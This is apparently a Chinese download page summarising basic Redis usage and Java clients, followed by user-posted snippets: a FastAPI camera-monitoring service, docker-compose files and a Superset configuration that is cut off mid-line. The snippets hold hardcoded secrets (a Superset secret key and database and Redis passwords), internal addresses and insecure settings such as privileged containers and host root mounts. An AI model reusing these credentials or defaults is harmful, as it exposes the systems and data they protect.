file-type

Redis基础用法指南与Java应用实践

ZIP文件

下载需积分: 10 | 684KB | 更新于2024-12-10 | 11 浏览量 | 0 下载量 举报 收藏
download 立即下载
Redis是一个开源的、使用ANSI C语言编写、支持网络、基于内存、可选持久性的键值存储数据库。由于其出色的表现,被广泛应用于各种场景,包括缓存、消息队列、会话共享、排行榜等。它的作者是Salvatore Sanfilippo,并且该项目是由Pivotal公司赞助的。Redis支持多种类型的数据结构,如字符串(strings)、列表(lists)、集合(sets)、有序集合(sorted sets)、哈希表(hash tables)、位图(bitmaps)、超日志(hyperloglogs)和地理空间索引(geospatial indexes)。 Java中操作Redis,一般会用到Jedis、Lettuce或者Spring Data Redis这样的客户端库。这些库提供了方便的API,可以实现与Redis服务器的连接、数据存取、数据类型操作、事务处理等功能。 以下是一些Redis的基础用法: 1. 基本命令操作 Redis的基本命令操作包括对键值对的增加、删除、查找、修改等操作。例如: - SET key value:设置一个键值对。 - GET key:获取与给定键关联的值。 - DEL key:删除给定的键值对。 - EXPIRE key seconds:设置键的过期时间。 - TTL key:获取键的剩余生存时间。 2. 数据结构操作 Redis支持的数据结构丰富,不同数据结构提供了不同的操作方法: - Lists(列表):LPOP/RPOP/LPUSH/RPUSH等,用于实现队列或栈。 - Sets(集合):SADD/SREM/SISMEMBER等,适合用于实现去重、交集、并集等操作。 - Sorted Sets(有序集合):ZADD/ZRANGE/ZREVRANGE等,可用于实现排行榜等功能。 - Hashes(哈希):HSET/HGET/HDEL等,方便操作对象类型数据。 3. 持久化 Redis提供了两种持久化方式,RDB(Redis Database)和AOF(Append Only File): - RDB:在指定的时间间隔内生成数据集的时间点快照。 - AOF:记录每次写操作命令,并在服务器启动时通过重新执行这些命令来恢复数据。 4. 事务 Redis的事务通过MULTI、EXEC、WATCH等命令实现。可以一次性、顺序地执行多个命令,并且保证所有命令要么全部执行成功,要么全部不执行。 5. 发布订阅 Redis的发布/订阅功能可以用于构建消息系统,包括PUBLISH、SUBSCRIBE、PSUBSCRIBE等命令,实现了消息的发布和订阅机制。 6. 连接池管理 在Java中,通过客户端库操作Redis时,连接池是管理和优化Redis连接的重要工具。通过连接池可以重用连接,减少连接的建立和销毁带来的开销。 以上只是Redis基础用法的一小部分。实际上Redis的使用场景和操作要复杂得多。掌握Redis的使用对于开发高性能的应用来说至关重要。开发者不仅需要熟悉其命令和操作,还需要理解其数据结构和内部机制,以便在实际应用中发挥其最大的效用。

相关推荐

filetype

import asyncio from contextlib import asynccontextmanager import json import logging import numpy as np import aioamqp import aioredis import oss2 from typing import AsyncGenerator, List, Optional from builtins import set from minio import Minio from motor.motor_asyncio import AsyncIOMotorClient from aioamqp.channel import Channel from aioamqp.envelope import Envelope from aioamqp.properties import Properties from aioredlock import Aioredlock, LockAcquiringError, LockError, Sentinel from fastapi import FastAPI, Request, Response from fastapi.responses import JSONResponse from fastapi.exceptions import RequestValidationError from fastapi_utils.api_settings import APISettings from sqlalchemy.exc import DatabaseError, IntegrityError from sqlalchemy.ext.asyncio import AsyncEngine, create_async_engine, AsyncSession from starlette.exceptions import HTTPException from starlette.middleware.exceptions import ExceptionMiddleware from qcloud_cos import CosConfig from qcloud_cos import CosS3Client from starlette.exceptions import HTTPException as StarletteHTTPException from pydantic.main import BaseModel from insightface.app import FaceAnalysis from pymilvus import MilvusClient, AsyncMilvusClient, DataType, RRFRanker, AnnSearchRequest from typing import Dict, Any, Union, Type, TypeVar, Callable, Tuple from pydantic.networks import RedisDsn from pydantic.env_settings import BaseSettings from pydantic.fields import Field import os import torch import filelock URL = "mysql+aiomysql://root:[email protected]/prison" class AppSettings(BaseModel): """App Settings""" API_DEBUG: Optional[bool] = False APP_INFO: Optional[Dict[str, Any]] HTTP_TIMEOUT: Optional[float] = 4.0 DATACENTER_ID: Optional[int] = 1 RBAC_MODEL_PATH: Optional[str] = 'rbac_model.conf' RBAC_POLICY_PATH: Optional[str] = 'rbac_policy.csv' PUBKEY: Optional[str] SECRET_KEY: Optional[str] ALGORITHM: Optional[str] = "HS256" ACCESS_TOKEN_EXPIRE_MINUTES: Optional[int] = 30 class MilvusSettings(BaseModel): """数据库配置""" MILVUS_DRIVER: str = "http" MILVUS_HOST: str = "192.168.1.159" MILVUS_PORT: int = "19530" MILVUS_USER: str = "root" MILVUS_PASSWORD: str = "Milvus" def get_milvus_url(self) -> Union[str]: return { "uri": f"{self.MILVUS_DRIVER}://{self.MILVUS_HOST}:{self.MILVUS_PORT}", # "token": f"{self.MILVUS_USER}:{self.MILVUS_PASSWORD}" } class DatabaseSettings(BaseModel): """数据库配置""" DATABASE_DRIVER: str = "mysql+aiomysql" DATABASE_HOST: str DATABASE_PORT: int DATABASE_USER: str DATABASE_PASSWORD: str DATABASE_NAME: str DATABASE_URL: Optional[str] = None def get_dburl(self) -> str: return URL class RedisSettings(BaseModel): """Redis 配置""" REDIS_HOST: str REDIS_PORT: int REDIS_PASSWORD: str REDIS_DB: int REDIS_URL: Optional[RedisDsn] = None REDIS_MINSIZE: int = 1 REDIS_MAXSIZE: int = 10 REDIS_ENCODING: str = "utf-8" def get_redis_address(self) -> Tuple[str, Dict[str, Any]]: opts = dict( db=self.REDIS_DB, minsize=self.REDIS_MINSIZE, maxsize=self.REDIS_MAXSIZE, encoding=self.REDIS_ENCODING, ) if self.REDIS_PASSWORD: opts.update({"password": self.REDIS_PASSWORD}) if self.REDIS_URL: return self.REDIS_URL, opts else: return f"redis://10.8.0.2:6379/0", opts class MongoDBSettings(BaseModel): MONGO_HOST: Optional[str] MONGO_PORT: Union[Optional[int], str] MONGO_USER: Optional[str] MONGO_PASSWORD: Optional[str] MONGO_URL: Optional[str] = None MONGO_DB: Optional[str] def connect_opts(self) -> Dict[str, Any]: if self.MONGO_URL: return {"host": self.MONGO_URL} return { "host": self.MONGO_HOST, "port": self.MONGO_PORT, "username": self.MONGO_USER, "password": self.MONGO_PASSWORD, } class AMQPSettings(BaseModel): AMQP_HOST: Optional[str] AMQP_PORT: Union[Optional[int], str] AMQP_USER: Optional[str] AMQP_PASSWORD: Optional[str] AMQP_URL: Optional[str] = None AMQP_QUEUE: Optional[str] class OSSSettings(BaseModel): OSS_ENDPOINT: str OSS_ACCESS_KEY_ID: Optional[str] OSS_ACCESS_KEY_SECRET: Optional[str] OSS_BUCKET_NAME: str class MINIIOSettings(BaseModel): MINIIO_HOST: Optional[str] MINIIO_PORT: Optional[str] = "9000" MINIIO_ACCESS_KEY: Optional[str] MINIIO_SECRET_KEY: Optional[str] MINIIO_BUCKET_NAME: Optional[str] MINIIO_DOINGS_PATH: Optional[str] MINIIO_SHOPPING_PATH: Optional[str] class SettingsMixin( BaseSettings, MilvusSettings, DatabaseSettings, RedisSettings, MongoDBSettings, AMQPSettings, OSSSettings, MINIIOSettings, AppSettings, ): """Settings Mixin""" T = TypeVar("T") def singleton(cls: Type[T]) -> Callable[[Any, Any], T]: """单例模式装饰器""" instances: Dict[Type[T], T] = {} def get_instance(*args: Any, **kwargs: Any) -> T: if cls not in instances: instances[cls] = cls(*args, **kwargs) return instances[cls] return get_instance @singleton class Settings(SettingsMixin): """基础配置""" env: str = Field(default="dev", env="ENV") class Config: env_prefix = "" env_file: str = os.getenv("CONFIG_PATH", "conf/online.conf") env_file_encoding: str = "utf-8" @property def debug(self) -> bool: if self.env == "prod": return False return True @property def milvus(self) -> MilvusSettings: return MilvusSettings(**self.dict()) @property def db(self) -> DatabaseSettings: return DatabaseSettings(**self.dict()) @property def redis(self) -> RedisSettings: return RedisSettings(**self.dict()) @property def api(self) -> APISettings: return APISettings(_env_file=self.Config.env_file) @property def app(self) -> AppSettings: return AppSettings(**self.dict()) background_tasks = set() # 定义异步打印函数 async def async_print(msg): print(msg) # 实际打印操作仍是同步的 await asyncio.sleep(0) # 主动让出控制权,实现异步效果 async def register_async_cron() -> None: task = asyncio.create_task(async_cron()) # 将 task 添加到集合中,以保持强引用,避免垃圾回收 background_tasks.add(task) # 等待所有任务完成 # await asyncio.gather(*[task]) # 为了防止 task 被永远保持强引用,而无法被垃圾回收 # 让每个 task 在结束后将自己从集合中移除: # task.add_done_callback(background_tasks.discard) await asyncio.sleep(0) # 主动让出控制权,实现异步效果 async def register_redis() -> None: address = "redis://10.8.0.2:6379/0" redis: aioredis.Redis = await aioredis.create_redis_pool(address) return redis async def async_cron(): async def get_database(app: FastAPI) -> AsyncGenerator[AsyncSession, None]: db = AsyncSession(expire_on_commit=False) try: yield db except Exception as e: await db.rollback() raise e finally: await db.close() seconds = 5 db = AsyncSession(expire_on_commit=False) redis_client: aioredis.Redis = await register_redis() logger.info("开始执行定时任务") # 配置Redis实例连接 redis_instances = [ f'redis://:[email protected]:6379/0' ] # 初始化锁管理器 lock_manager = Aioredlock(redis_instances) while True: await asyncio.sleep(seconds) try: await lock_manager.lock("resource_name", lock_timeout=seconds) logger.info(f"成功获取锁,正在执行受保护的任务...") data: Equipment = Equipment() list_content: Optional[List[Equipment]] = await data.list(db, 0, 200, preload=False) for item in list_content: static = "offline" equ = Equipment(**item.to_dict()) tester = ICMPSocketPing(equ.ip_address, timeout=1, retry=1) redis_icmp_ping = await redis_client.get(f"ipadder_{equ.ip_address}") # if not redis_icmp_ping: redis_icmp_ping = "offline" if tester.ping(): # "online" static = "online" if redis_icmp_ping != static: await equ.update_part(session=db, detail=False, **{'id': equ.id, 'status': EquipmentStatusEnum.ONLINE}) else: # "offline" static = "offline" if redis_icmp_ping != static: await equ.update_part(session=db, detail=False, **{'id': equ.id, 'status': EquipmentStatusEnum.OFFLINE}) pass logger.info(f'摄像头 {equ.ip_address} 状态 {static}') await redis_client.setex(f"ipadder_{equ.ip_address}", seconds, static) except LockError as e: # Lock not acquired continue await asyncio.sleep(0) # 主动让出控制权,实现异步效果 await lock_manager.destroy() async def main(): # 创建异步任务并发执行 task1 = asyncio.create_task(register_async_cron()) # 等待所有任务完成 await task1 if __name__ == "__main__": asyncio.run(main()) # 运行异步主函数 print("Hello World!")解析全段代码

filetype

帮我改写一下,使用默认的bridge网络 version: '3' services: pro-redis: image: redis:latest ports: - "172.18.200.6:6379:6379" privileged: true environment: TZ: Asia/Shanghai volumes: - /ifs1/tNGS/redis/data:/data - /ifs1/tNGS/redis/log:/var/log/redis - /ifs1/tNGS/redis/conf.d:/usr/local/etc/redis container_name: pro-redis command: /usr/local/bin/redis-server /usr/local/etc/redis/redis.conf restart: always pro-mariadb: image: chenjh.tencentcloudcr.com/common-mariadb/mariadb:latest ports: - "172.18.200.6:3306:3306" privileged: true environment: MYSQL_ROOT_PASSWORD : 123456 MARIADB_ROOT_PASSWORD : 123456 TZ: Asia/Shanghai volumes: - /etc/localtime:/etc/localtime - /ifs1/tNGS/mariadb/mysql:/var/lib/mysql - /ifs1/tNGS/mariadb/log:/var/log/mysql/log - /ifs1/tNGS/mariadb/conf.d/mariadb.cnf:/etc/mysql/conf.d/mariadb.cnf container_name: pro-mariadb restart: always pro-springboot: image: chenjh.tencentcloudcr.com/shengxiang/pathogen:latest ports: - "172.18.200.6:8080:8080" privileged: true environment: MARIADB_HOST: 172.18.200.6 MARIADB_PORT: 3306 MARIADB_ROOT_PASSWORD : 123456 AUTORUN_CRON: "0 0 */1 * * *" REDIS_HOST: 172.18.200.6 REDIS_PORT: 6379 REDIS_PWD: xxxxxxxxxx WORK_DIR: /ifs1/tNGS/webapp/workplace volumes: - /etc/localtime:/etc/localtime - /:/prj - /ifs1/tNGS/webapp/cloud:/cloud - /ifs1/tNGS/webapp/autorun:/autorun - /ifs1/tNGS/webapp/nginx/static:/workplace/nginx/static - /ifs1/tNGS/webapp/log:/workplace/logs - /ifs1/tNGS/webapp/conf.d/application.properties:/pathogen/config/application.properties container_name: pro-webapp command: /usr/bin/bash restart: always depends_on: - pro-mariadb pro-nginx: image: chenjh.tencentcloudcr.com/shengxiang/nginx-pathogen:latest ports: - "172.18.200.6:8082:8081" privileged: true volumes: - /etc/localtime:/etc/localtime - /ifs1/tNGS/nginx/conf.d:/etc/nginx/conf.d - /ifs1/tNGS/webapp/nginx:/nginx - /ifs1/tNGS/nginx/log/access.log:/var/log/nginx/access.log - /ifs1/tNGS/nginx/log/error.log:/var/log/nginx/error.log container_name: pro-nginx restart: always depends_on: - pro-springboot

filetype

WARN[0000] /paperless-ngx/docker-compose.yml: `version` is obsolete name: paperless-ngx services: broker: image: redis:7 networks: default: null restart: unless-stopped volumes: - type: volume source: redisdata target: /data volume: {} db: environment: POSTGRES_DB: paperless POSTGRES_PASSWORD: paperless POSTGRES_USER: paperless image: postgres:15 networks: default: null restart: unless-stopped volumes: - type: volume source: pgdata target: /var/lib/postgresql/data volume: {} webserver: depends_on: broker: condition: service_started required: true db: condition: service_started required: true environment: PAPERLESS_DBHOST: db PAPERLESS_DBNAME: paperless PAPERLESS_DBPASS: paperless PAPERLESS_DBUSER: paperless PAPERLESS_REDIS: redis://broker:6379 env_file: .env healthcheck: test: - CMD - curl - -f - http://localhost:8000 timeout: 10s interval: 30s retries: 5 image: ghcr.io/paperless-ngx/paperless-ngx:latest networks: default: null ports: - mode: ingress target: 8000 published: "8000" protocol: tcp restart: unless-stopped volumes: - type: volume source: data target: /usr/src/paperless/data volume: {} - type: volume source: media target: /usr/src/paperless/media volume: {} - type: bind source: /paperless-ngx/data/export target: /usr/src/paperless/export bind: create_host_path: true - type: bind source: /paperless-ngx/data/consume target: /usr/src/paperless/consume bind: create_host_path: true networks: default: name: paperless-ngx_default volumes: data: name: paperless-ngx_data media: name: paperless-ngx_media pgdata: name: paperless-ngx_pgdata redisdata: name: paperless-ngx_redisdata

filetype

以下是Superset的配置文件,请检查是否启用了Guest Token 功能: #!/usr/bin/env python # -*- coding: utf-8 -*- """ 优化的Superset混合认证配置 """ import os import sys import logging import pymysql import ssl from urllib.parse import quote_plus from flask_sqlalchemy import SQLAlchemy # ============================================================================ # 基础配置 # ============================================================================ BASE_DIR = os.path.dirname(__file__) sys.path.append(BASE_DIR) # 环境变量 ENVIRONMENT = os.getenv("SUPERSET_ENV", "development") # production/development IS_PRODUCTION = ENVIRONMENT == "production" IS_DEVELOPMENT = ENVIRONMENT == "development" # 版本和部署信息 SUPERSET_VERSION = os.getenv("SUPERSET_VERSION", "4.1.2") DEPLOYMENT_ID = os.getenv("DEPLOYMENT_ID", "default") print(f"🔧 加载Superset配置 - 环境: {ENVIRONMENT}") # ============================================================================ # 数据库配置(优化版) # ============================================================================ pymysql.install_as_MySQLdb() db = SQLAlchemy() DB_USER = os.getenv("SUPERSET_DB_USER", "superset") DB_PASSWORD = os.getenv("SUPERSET_DB_PASSWORD", "SupersetPassword2025!") DB_HOST = os.getenv("SUPERSET_DB_HOST", "10.18.6.120") DB_PORT = int(os.getenv("SUPERSET_DB_PORT", "3306")) DB_NAME = os.getenv("SUPERSET_DB_NAME", "superset") SQLALCHEMY_DATABASE_URI = ( f"mysql+pymysql://{DB_USER}:{DB_PASSWORD}@{DB_HOST}:{DB_PORT}/{DB_NAME}" "?charset=utf8mb4" ) # 优化的数据库引擎配置 SQLALCHEMY_ENGINE_OPTIONS = { "pool_pre_ping": True, "pool_recycle": 3600, "pool_timeout": 30, "max_overflow": 20, "pool_size": 10, "echo": False, "isolation_level": "READ_COMMITTED", "connect_args": { "connect_timeout": 10, "read_timeout": 60, "write_timeout": 60, "charset": "utf8mb4", # 移除了collation参数 "autocommit": False, "sql_mode": "STRICT_TRANS_TABLES,NO_ZERO_DATE,NO_ZERO_IN_DATE,ERROR_FOR_DIVISION_BY_ZERO", } } # SQLAlchemy配置优化 SQLALCHEMY_TRACK_MODIFICATIONS = False SQLALCHEMY_RECORD_QUERIES = False SQLALCHEMY_ECHO = False # 数据库健康检查 DATABASE_HEALTH_CHECK_ENABLED = True DATABASE_HEALTH_CHECK_INTERVAL = 30 # ============================================================================ # SQLLab专用配置(修复前端错误) # ============================================================================ # SQLLab基础配置 ENABLE_SQLLAB = True SQLLAB_BACKEND_PERSISTENCE = True SQLLAB_TIMEOUT = 300 SQL_MAX_ROW = 10000 SQLLAB_DEFAULT_DBID = None SQLLAB_CTAS_NO_LIMIT = True SQLLAB_QUERY_COST_ESTIMATES_ENABLED = False # 关闭查询成本估算 SQLLAB_ASYNC_TIME_LIMIT_SEC = 600 # 防止SQLLab错误的配置 PREVENT_UNSAFE_DB_CONNECTIONS = False SQLLAB_VALIDATION_TIMEOUT = 10 ENABLE_TEMPLATE_PROCESSING = True # 查询结果配置 SUPERSET_WEBSERVER_TIMEOUT = 300 SUPERSET_WORKERS = 1 if IS_DEVELOPMENT else 4 # ============================================================================ # 安全配置 (多层防护) # ============================================================================ SECRET_KEY = os.environ.get( "SUPERSET_SECRET_KEY", "FPwbFnYKL6wQTD0vtQfGBw7Y530FUfufsnHwXQTLlrrn8koVcctkMwiK", ) # 安全检查 if len(SECRET_KEY) < 32: raise ValueError("SECRET_KEY长度必须至少32位") if IS_DEVELOPMENT: logging.debug(f"SECRET_KEY已设置: {'*' * len(SECRET_KEY)}") # 禁用安全警告弹框 SECURITY_WARNING_BANNER = False # 或者设置为空字符串 SECURITY_WARNING_MESSAGE = "" # ============================================================================ # Redis和异步查询检查 # ============================================================================ # 检查Redis可用性 REDIS_HOST = os.getenv("REDIS_HOST", "localhost") REDIS_PORT = int(os.getenv("REDIS_PORT", "6379")) REDIS_PASSWORD = os.getenv("REDIS_PASSWORD", "minth@888") # Redis密码 REDIS_DB = int(os.getenv("REDIS_DB", "0")) # URL编码密码以处理特殊字符 REDIS_PASSWORD_ENCODED = quote_plus(REDIS_PASSWORD) if REDIS_PASSWORD else "" # 构建Redis连接URL if REDIS_PASSWORD: REDIS_URL = f"redis://:{REDIS_PASSWORD_ENCODED}@{REDIS_HOST}:{REDIS_PORT}" else: REDIS_URL = f"redis://{REDIS_HOST}:{REDIS_PORT}" # 检查Redis可用性 REDIS_AVAILABLE = False try: import redis # 创建Redis连接(带密码) r = redis.Redis( host=REDIS_HOST, port=REDIS_PORT, password=REDIS_PASSWORD if REDIS_PASSWORD else None, socket_timeout=5, socket_connect_timeout=5 ) # 测试连接 r.ping() REDIS_AVAILABLE = True print(f"✅ Redis连接成功: {REDIS_HOST}:{REDIS_PORT} (已认证)") # 测试基本操作 test_key = "superset_test" r.set(test_key, "test_value", ex=10) # 10秒过期 if r.get(test_key): print("✅ Redis读写测试成功") r.delete(test_key) except Exception as e: print(f"⚠️ Redis连接失败: {e}") REDIS_AVAILABLE = False # ============================================================================ # 特性标志 # ============================================================================ FEATURE_FLAGS = { # SQLLab核心功能 "ENABLE_SQLLAB": True, "SQLLAB_BACKEND_PERSISTENCE": True, "ESTIMATE_QUERY_COST": False, # 关闭可能导致ROLLBACK的功能 "QUERY_COST_FORMATTERS_BY_ENGINE": {}, "RESULTS_BACKEND_USE_MSGPACK": True, # 🔧 强制启用msgpack # 权限和安全 "DASHBOARD_RBAC": True, "ENABLE_EXPLORE_JSON_CSRF_PROTECTION": True, "ENABLE_TEMPLATE_PROCESSING": True, "ROW_LEVEL_SECURITY": True, # 行级安全 # 嵌入功能 "EMBEDDED_SUPERSET": True, "ALLOW_DASHBOARD_EMBEDDING": True, "EMBEDDED_IN_FRAME": True, # 过滤器和交互 "DASHBOARD_NATIVE_FILTERS": True, "DASHBOARD_CROSS_FILTERS": True, "ENABLE_FILTER_BOX_MIGRATION": True, "DASHBOARD_FILTERS": True, # 异步查询 禁用 "GLOBAL_ASYNC_QUERIES": False , "ASYNC_QUERIES": False, "SCHEDULED_QUERIES": False, # 高级功能 暂时不设置 "ENABLE_JAVASCRIPT_CONTROLS": True, "DYNAMIC_PLUGINS": False, "THUMBNAILS": REDIS_AVAILABLE, "SCREENSHOTS": REDIS_AVAILABLE, # 开发和调试(仅开发环境) "ENABLE_REACT_CRUD_VIEWS": IS_DEVELOPMENT, "ENABLE_BROAD_ACTIVITY_ACCESS": IS_DEVELOPMENT, } # ============================================================================ # 禁用异步查询配置·RESULTS_BACKEND # ============================================================================ RESULTS_BACKEND = None CELERY_CONFIG = None # ============================================================================ # 结果处理修复配置 # ============================================================================ RESULTS_BACKEND_USE_MSGPACK = True import json class SupersetJSONEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if hasattr(obj, 'isoformat'): return obj.isoformat() if hasattr(obj, '__dict__'): return obj.__dict__ return super().default(obj) JSON_DEFAULT = SupersetJSONEncoder().encode SQLLAB_RESULTS_BACKEND_PERSISTENCE = True SQLLAB_TIMEOUT = 300 SUPERSET_SQLLAB_TIMEOUT = 300 print("🔧 结果处理配置已修复") # ============================================================================ # LDAP认证配置(增强版) # ============================================================================ from flask_appbuilder.security.manager import AUTH_LDAP AUTH_TYPE = AUTH_LDAP # LDAP服务器配置 AUTH_LDAP_SERVER = "ldap://10.18.2.50:389" AUTH_LDAP_USE_TLS = False # 可根据服务器能力调整 # 用户名和搜索配置 AUTH_LDAP_USERNAME_FORMAT = "%(username)[email protected]" AUTH_LDAP_SEARCH = "dc=minth,dc=intra" AUTH_LDAP_SEARCH_FILTER = "(sAMAccountName={username})" # 用户属性映射 AUTH_LDAP_UID_FIELD = "sAMAccountName" AUTH_LDAP_FIRSTNAME_FIELD = "givenName" AUTH_LDAP_LASTNAME_FIELD = "sn" AUTH_LDAP_EMAIL_FIELD = "mail" # LDAP行为配置 AUTH_LDAP_ALLOW_SELF_SIGNED = True AUTH_LDAP_ALWAYS_SEARCH = True # 用户管理 AUTH_USER_REGISTRATION = False AUTH_USER_REGISTRATION_ROLE = "Public" AUTH_ROLES_SYNC_AT_LOGIN = True # 角色映射 AUTH_ROLES_MAPPING = { "cn=SupersetAdmins,ou=Groups,dc=minth,dc=intra": ["Admin"], "cn=DataAnalysts,ou=Groups,dc=minth,dc=intra": ["Alpha"], "cn=DataViewers,ou=Groups,dc=minth,dc=intra": ["Gamma"], "cn=ReportViewers,ou=Groups,dc=minth,dc=intra": ["Public"], } AUTH_LDAP_GROUP_FIELD = "memberOf" # ============================================================================ # 混合安全管理器 # ============================================================================ try: from security.hybrid_security_manager import HybridSecurityManager CUSTOM_SECURITY_MANAGER = HybridSecurityManager # 指定数据库认证用户(与HybridSecurityManager中的DB_AUTH_USERS对应) DB_AUTH_USERS = ['admin','superset'] # LDAP连接池和缓存配置 # AUTH_LDAP_POOL_SIZE = 10 # AUTH_LDAP_POOL_RETRY_MAX = 3 # AUTH_LDAP_POOL_RETRY_DELAY = 30 # AUTH_LDAP_CACHE_ENABLED = True # AUTH_LDAP_CACHE_TIMEOUT = 300 # 认证策略配置 AUTH_STRATEGY = { 'db_first_users': DB_AUTH_USERS, 'ldap_fallback_enabled': True, 'cache_enabled': REDIS_AVAILABLE, # 只有Redis可用时才启用缓存 'cache_timeout': 300, 'max_login_attempts': 5, 'lockout_duration': 900, # 15分钟 } print("✅ 混合安全管理器已启用") except ImportError as e: print(f"⚠️ 混合安全管理器导入失败,使用标准LDAP认证: {e}") CUSTOM_SECURITY_MANAGER = None # ============================================================================ # Guest Token配置(安全优化版) # ============================================================================ GUEST_TOKEN_JWT_SECRET = SECRET_KEY GUEST_TOKEN_JWT_ALGO = "HS256" GUEST_TOKEN_JWT_EXP_DELTA_SECONDS = 3600 GUEST_TOKEN_HEADER_NAME = "X-GuestToken" # 强制设置AUD验证 SUPERSET_BASE_URL = os.getenv("SUPERSET_BASE_URL", None) GUEST_TOKEN_JWT_AUD = SUPERSET_BASE_URL # Guest Token增强配置 GUEST_TOKEN_AUTO_REFRESH = True GUEST_TOKEN_REFRESH_THRESHOLD = 300 # 5分钟内过期自动刷新 GUEST_TOKEN_MAX_CONCURRENT = 100 # 最大并发Token数 # ============================================================================ # 缓存配置(修复版) # ============================================================================ if REDIS_AVAILABLE: # 生产环境Redis缓存 CACHE_CONFIG = { 'CACHE_TYPE': 'redis', 'CACHE_REDIS_HOST': REDIS_HOST, 'CACHE_REDIS_PORT': REDIS_PORT, 'CACHE_REDIS_DB': REDIS_DB, # 使用DB 0作为缓存 'CACHE_DEFAULT_TIMEOUT': 300, 'CACHE_KEY_PREFIX': f'superset_{DEPLOYMENT_ID}_', } # 如果有密码,添加密码配置 if REDIS_PASSWORD: CACHE_CONFIG['CACHE_REDIS_PASSWORD'] = REDIS_PASSWORD CACHE_CONFIG['CACHE_REDIS_URL'] = f"{REDIS_URL}/{REDIS_DB}" print(f"✅ Redis缓存配置: {REDIS_HOST}:{REDIS_PORT}/{REDIS_DB}") else: # 开发环境或Redis不可用时使用简单缓存 CACHE_CONFIG = { 'CACHE_TYPE': 'simple', 'CACHE_DEFAULT_TIMEOUT': 60, } print("ℹ️ 使用简单缓存") # ============================================================================ # 安全头配置(生产环境优化) # ============================================================================ # 消除CSP警告 CONTENT_SECURITY_POLICY_WARNING = False if IS_PRODUCTION: # 生产环境:最严格安全配置 TRUSTED_DOMAINS = [d.strip() for d in os.getenv("TRUSTED_DOMAINS", "").split(",") if d.strip()] HTTP_HEADERS = { "X-Frame-Options": "SAMEORIGIN", # 更安全的默认值 "X-XSS-Protection": "1; mode=block", "X-Content-Type-Options": "nosniff", "Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload", "Referrer-Policy": "strict-origin-when-cross-origin", "Permissions-Policy": "geolocation=(), microphone=(), camera=()", } # 如果有信任域名,则允许特定域名 if TRUSTED_DOMAINS: HTTP_HEADERS["X-Frame-Options"] = f"ALLOW-FROM {TRUSTED_DOMAINS[0]}" TALISMAN_ENABLED = True TALISMAN_CONFIG = { 'content_security_policy': { 'default-src': "'self'", 'script-src': "'self' 'unsafe-inline' 'unsafe-eval'", 'style-src': "'self' 'unsafe-inline'", 'img-src': "'self' data: blob: https:", 'font-src': "'self' data:", 'frame-ancestors': TRUSTED_DOMAINS or ["'self'"], 'connect-src': "'self'", }, 'force_https': os.getenv("FORCE_HTTPS", "false").lower() == "true", 'strict_transport_security': True, 'strict_transport_security_max_age': 31536000, } # CORS严格配置 CORS_ORIGIN_ALLOW_ALL = False CORS_ORIGIN_WHITELIST = TRUSTED_DOMAINS ENABLE_CORS = len(TRUSTED_DOMAINS) > 0 else: # 开发环境:宽松配置 HTTP_HEADERS = { "X-Frame-Options": "", "X-XSS-Protection": "1; mode=block", } TALISMAN_ENABLED = False CORS_ORIGIN_ALLOW_ALL = True ENABLE_CORS = True # ============================================================================ # 日志配置(生产级) # ============================================================================ LOG_DIR = os.getenv("SUPERSET_LOG_DIR", "/app/superset/logs") os.makedirs(LOG_DIR, exist_ok=True) LOG_LEVEL = "INFO" if IS_PRODUCTION else "DEBUG" LOG_FORMAT = "%(asctime)s [%(levelname)s] %(name)s:%(lineno)d - %(funcName)s() - %(message)s" LOGGING_CONFIG = { "version": 1, "disable_existing_loggers": False, "formatters": { "detailed": { "format": LOG_FORMAT, "datefmt": "%Y-%m-%d %H:%M:%S", }, "simple": { "format": "%(levelname)s - %(message)s", }, "json": { "format": "%(asctime)s %(name)s %(levelname)s %(message)s", }, }, "handlers": { "console": { "level": LOG_LEVEL, "class": "logging.StreamHandler", "formatter": "simple" if IS_DEVELOPMENT else "json", }, "app_file": { "level": "INFO", "class": "logging.handlers.RotatingFileHandler", "filename": f"{LOG_DIR}/superset.log", "maxBytes": 10485760, # 20MB "backupCount": 5, "formatter": "detailed", }, "auth_file": { "level": "INFO", "class": "logging.handlers.RotatingFileHandler", "filename": f"{LOG_DIR}/auth.log", "maxBytes": 10485760, # 10MB "backupCount": 5, "formatter": "detailed", }, "error_file": { "level": "ERROR", "class": "logging.handlers.RotatingFileHandler", "filename": f"{LOG_DIR}/error.log", "maxBytes": 10485760, "backupCount": 10, "formatter": "detailed", }, # "security_file": { # "level": "WARNING", # "class": "logging.handlers.RotatingFileHandler", # "filename": f"{LOG_DIR}/security.log", # "maxBytes": 10485760, # "backupCount": 10, # "formatter": "detailed", # }, }, "loggers": { "superset": { "level": LOG_LEVEL, "handlers": ["app_file", "console"], "propagate": False, }, "flask_appbuilder.security": { "level": "INFO", "handlers": ["auth_file", "console"], "propagate": False, }, "security_manager": { "level": LOG_LEVEL, "handlers": ["auth_file", "console"], "propagate": False, }, "werkzeug": { "level": "WARNING", "handlers": ["console"], "propagate": False, }, }, "root": { "level": LOG_LEVEL, "handlers": ["console"], }, } # ============================================================================ # 业务配置 # ============================================================================ # 角色设置 GUEST_ROLE_NAME = "Public" PUBLIC_ROLE_LIKE = "Gamma" PUBLIC_ROLE_LIKE_GAMMA = True # 国际化 BABEL_DEFAULT_LOCALE = "zh" BABEL_DEFAULT_FOLDER = "babel/translations" LANGUAGES = { "en": {"flag": "us", "name": "English"}, "zh": {"flag": "cn", "name": "Chinese"}, } # 系统设置 SUPERSET_DEFAULT_TIMEZONE = "Asia/Shanghai" SUPERSET_WEBSERVER_TIMEOUT = 120 if IS_PRODUCTION else 60 # 基础功能启用 ENABLE_CSRF = True ENABLE_SWAGGER = not IS_PRODUCTION # 生产环境关闭Swagger ENABLE_GUEST_TOKEN = True EMBEDDED_SUPERSET = True ALLOW_DASHBOARD_EMBEDDING = True # ============================================================================ # 环境特定配置 # ============================================================================ if IS_PRODUCTION: # 生产环境优化 WTF_CSRF_TIME_LIMIT = 7200 SEND_FILE_MAX_AGE_DEFAULT = 31536000 # 数据源连接超时 SQL_MAX_ROW = 100000 SQLLAB_TIMEOUT = 300 SUPERSET_WORKERS = int(os.getenv("SUPERSET_WORKERS", "4")) else: # 开发环境配置 WTF_CSRF_TIME_LIMIT = None SQL_MAX_ROW = 10000 SQLLAB_TIMEOUT = 60 # ============================================================================ # 启动验证 # ============================================================================ def validate_config(): """配置验证""" errors = [] # 必需的环境变量检查 required_env_vars = ["SUPERSET_SECRET_KEY"] if IS_PRODUCTION: required_env_vars.extend(["SUPERSET_BASE_URL", 